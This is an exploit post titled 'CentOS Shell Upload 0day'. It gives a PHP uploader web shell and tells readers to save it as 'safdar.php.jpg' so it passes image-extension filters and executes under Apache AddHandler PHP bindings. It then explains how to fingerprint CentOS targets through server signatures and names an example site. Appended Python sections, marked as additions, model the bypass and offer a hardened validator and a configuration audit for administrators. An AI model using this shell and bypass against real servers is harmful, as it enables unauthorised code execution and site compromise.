CentOS Shell Upload 0day
Code:
<?php
// Minimal uploader: prints a form, then writes the submitted file next to this
// script under the client-supplied name. Whatever name the file is stored under
// is the name Apache will map to a handler when it is requested.
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50">';
echo '<input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if (isset($_POST['_upl']) && $_POST['_upl'] == "Upload") {
    // copy() from tmp_name is used as in the original; move_uploaded_file() would be the usual call.
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>Upload SUCCESS !!!</b><br><br>';
    } else {
        echo '<b>Upload FAILED !!!</b><br><br>';
    }
}
?>
Save it under a name that ends in an image extension but still carries .php before it, for example safdar.php.jpg. The trailing extension has to be one the target accepts (jpg, jpeg, png and so on). The result is not a real image: it is PHP source with an image extension appended, so on your own machine it will get an image icon but will not render as a picture. An upload form that checks only the last extension sees .jpg and accepts it. What decides whether the code runs is how Apache on the server maps the stored name to a handler: when PHP is bound with AddHandler or AddType for .php, Apache treats every dot-separated part of the filename as an extension, so safdar.php.jpg is still handed to the PHP handler even though its last extension says it is an image. Request the uploaded file in your browser and the PHP code executes.
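The following Python is an added example, not code from the original post, that shows the three pieces of the bypass side by side: a filter that only checks the trailing extension, a model of Apache's multiple-extension handler matching under an assumed "AddHandler php5-script .php" binding, and a hardened validator that rejects the double extension, checks magic bytes and picks its own filename. The allow-list, the handler table, the magic-byte table and the sample inputs are all constructed for the example.

```python
import os
import secrets
from typing import Optional, Tuple

# Constructed allow-list that an image-upload form might use.
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Handler bindings as produced by "AddHandler php5-script .php" (assumed
# Apache/mod_php configuration; .phtml added for illustration).
HANDLER_EXTENSIONS = {"php": "php5-script", "phtml": "php5-script"}

# Leading bytes of the allowed image formats (constructed table).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def naive_filter_accepts(filename: str) -> bool:
    """A check that looks only at the trailing extension: safdar.php.jpg passes."""
    return filename.lower().endswith(tuple("." + e for e in IMAGE_EXTENSIONS))


def apache_handler_for(filename: str) -> Optional[str]:
    """Model mod_mime's multiple-extension rule: every dot-separated segment after
    the first is an extension, and a handler bound to any of them applies
    (rightmost binding wins). So x.php.jpg is served by PHP, not as an image."""
    handler = None
    for seg in os.path.basename(filename).split(".")[1:]:
        handler = HANDLER_EXTENSIONS.get(seg.lower(), handler)
    return handler


def hardened_accepts(filename: str, content: bytes) -> Tuple[bool, str]:
    """Validate an upload the way the server side should: path stripped, exactly
    one extension, extension in the allow-list, magic bytes matching the declared
    type, and a server-chosen filename so the client never controls what lands
    on disk. Returns (accepted, stored_name_or_reason)."""
    name = os.path.basename(filename)
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "name must be <base>.<ext> with exactly one extension"
    ext = parts[1]
    if ext not in IMAGE_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    stored = f"{secrets.token_hex(16)}.{ext}"  # random name, no client input
    return True, stored


# Constructed inputs: the post's shell name with PHP source, and a JPEG header.
SHELL_NAME = "safdar.php.jpg"
SHELL_BYTES = b"<?php echo 'pwned'; ?>"
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    print("naive filter accepts:", naive_filter_accepts(SHELL_NAME))   # True
    print("apache handler:", apache_handler_for(SHELL_NAME))           # php5-script
    print("hardened:", hardened_accepts(SHELL_NAME, SHELL_BYTES))      # (False, ...)
    print("hardened:", hardened_accepts("../photo.jpg", JPEG_BYTES))   # (True, '<random>.jpg')
```

The validator is one layer, not the whole fix: the upload directory should also live outside DocumentRoot or be served with PHP disabled, and PHP should be bound with a FilesMatch on a trailing .php rather than AddHandler, so that a name like safdar.php.jpg can never reach the PHP handler in the first place.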
How to tell whether a server is running CentOS?
Look at the Server response header, for example with the Live HTTP Headers browser extension. If you are not familiar with that, make the site return an error page such as a 404 Not Found or 403 Forbidden and read the server signature at the bottom. It looks like:
Apache/2.2.15 (CentOS) Server at www.target.com Port 80
Note that the distribution name is only shown when ServerTokens is set to OS or Full; a server that has been tightened to ServerTokens Prod will say just "Apache", which tells you nothing about the distribution.
Example:
http://domain.me/files/
This is not tied to a particular CentOS version. It works wherever Apache binds PHP by extension with AddHandler or AddType, which is how the stock php.conf for mod_php did it on CentOS 5 and 6 (AddHandler php5-script .php); later releases switched to a FilesMatch block anchored on a trailing .php, which does not match safdar.php.jpg. Hosting panels such as Kloxo and zPanel that ship the AddHandler style of configuration put their sites at the same risk.
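For the administrator side of the two checks above (reading the server signature, and confirming whether the host's PHP binding is the vulnerable AddHandler/AddType style), here is an added Python audit, not code from the original post. The two configuration excerpts and the directory listing are constructed for the example; on a real host you would feed it /etc/httpd/conf.d/php.conf and a walk of the upload directory (assumed paths).

```python
import os
import re
from typing import Iterable, List, Optional, Tuple

# Extensions Apache is commonly told to hand to PHP (assumption; adjust to your config).
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml"}

SIGNATURE_RE = re.compile(r"(Apache)/([\d.]+)\s*\(([^)]+)\)")
ADD_DIRECTIVE_RE = re.compile(r"^\s*(AddHandler|AddType)\s+(\S+)\s+(.+?)\s*$", re.I | re.M)

# Constructed excerpt modelled on the mod_php php.conf shipped with CentOS 5/6.
LEGACY_PHP_CONF = """\
LoadModule php5_module modules/libphp5.so
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
"""

# Constructed excerpt of the later FilesMatch style, anchored on a trailing .php.
STRICT_PHP_CONF = r"""
<FilesMatch \.php$>
    SetHandler application/x-httpd-php
</FilesMatch>
"""

# Constructed listing of an upload directory.
SAMPLE_LISTING = ["photo.jpg", "safdar.php.jpg", "notes.txt", "avatar.PhP.png", "index.php"]


def parse_server_signature(text: str) -> Optional[Tuple[str, str, str]]:
    """Pull (product, version, platform) out of a Server header or the footer of an
    Apache error page: 'Apache/2.2.15 (CentOS) ...' -> ('Apache', '2.2.15', 'CentOS').
    Returns None when ServerTokens hides the platform (plain 'Apache')."""
    m = SIGNATURE_RE.search(text)
    return (m.group(1), m.group(2), m.group(3)) if m else None


def php_bindings_via_add(config_text: str) -> List[Tuple[str, str, List[str]]]:
    """Return AddHandler/AddType lines that bind PHP by extension. These match any
    dot-separated segment of a filename, so x.php.jpg still reaches PHP. A
    FilesMatch block is not reported because its regex anchors on the end of the name."""
    hits = []
    for m in ADD_DIRECTIVE_RE.finditer(config_text):
        directive, target, exts = m.group(1), m.group(2), m.group(3).split()
        binds_php = (
            directive.lower() == "addhandler"
            and any(e.lstrip(".").lower() in PHP_EXTENSIONS for e in exts)
        ) or (directive.lower() == "addtype" and "php" in target.lower())
        if binds_php:
            hits.append((directive, target, exts))
    return hits


def double_extension_php_files(names: Iterable[str]) -> List[str]:
    """Flag names where a PHP extension sits before the final extension
    (safdar.php.jpg). A plain index.php is a normal script and is not reported."""
    flagged = []
    for name in names:
        segments = os.path.basename(name).lower().split(".")[1:]
        if any(seg in PHP_EXTENSIONS for seg in segments[:-1]):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    print(parse_server_signature("Apache/2.2.15 (CentOS) Server at www.target.com Port 80"))
    print("legacy conf bindings:", php_bindings_via_add(LEGACY_PHP_CONF))
    print("strict conf bindings:", php_bindings_via_add(STRICT_PHP_CONF))
    print("suspicious uploads:", double_extension_php_files(SAMPLE_LISTING))
```

A host where php_bindings_via_add reports a hit and double_extension_php_files reports anything in a world-writable upload directory has very likely already been used this way; the fix is the FilesMatch binding plus an upload directory that Apache does not execute from.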
This exploit/vulnerability was discovered by 1337 from TeaM MaDLeeTs
http://www.MaDLeeTs.com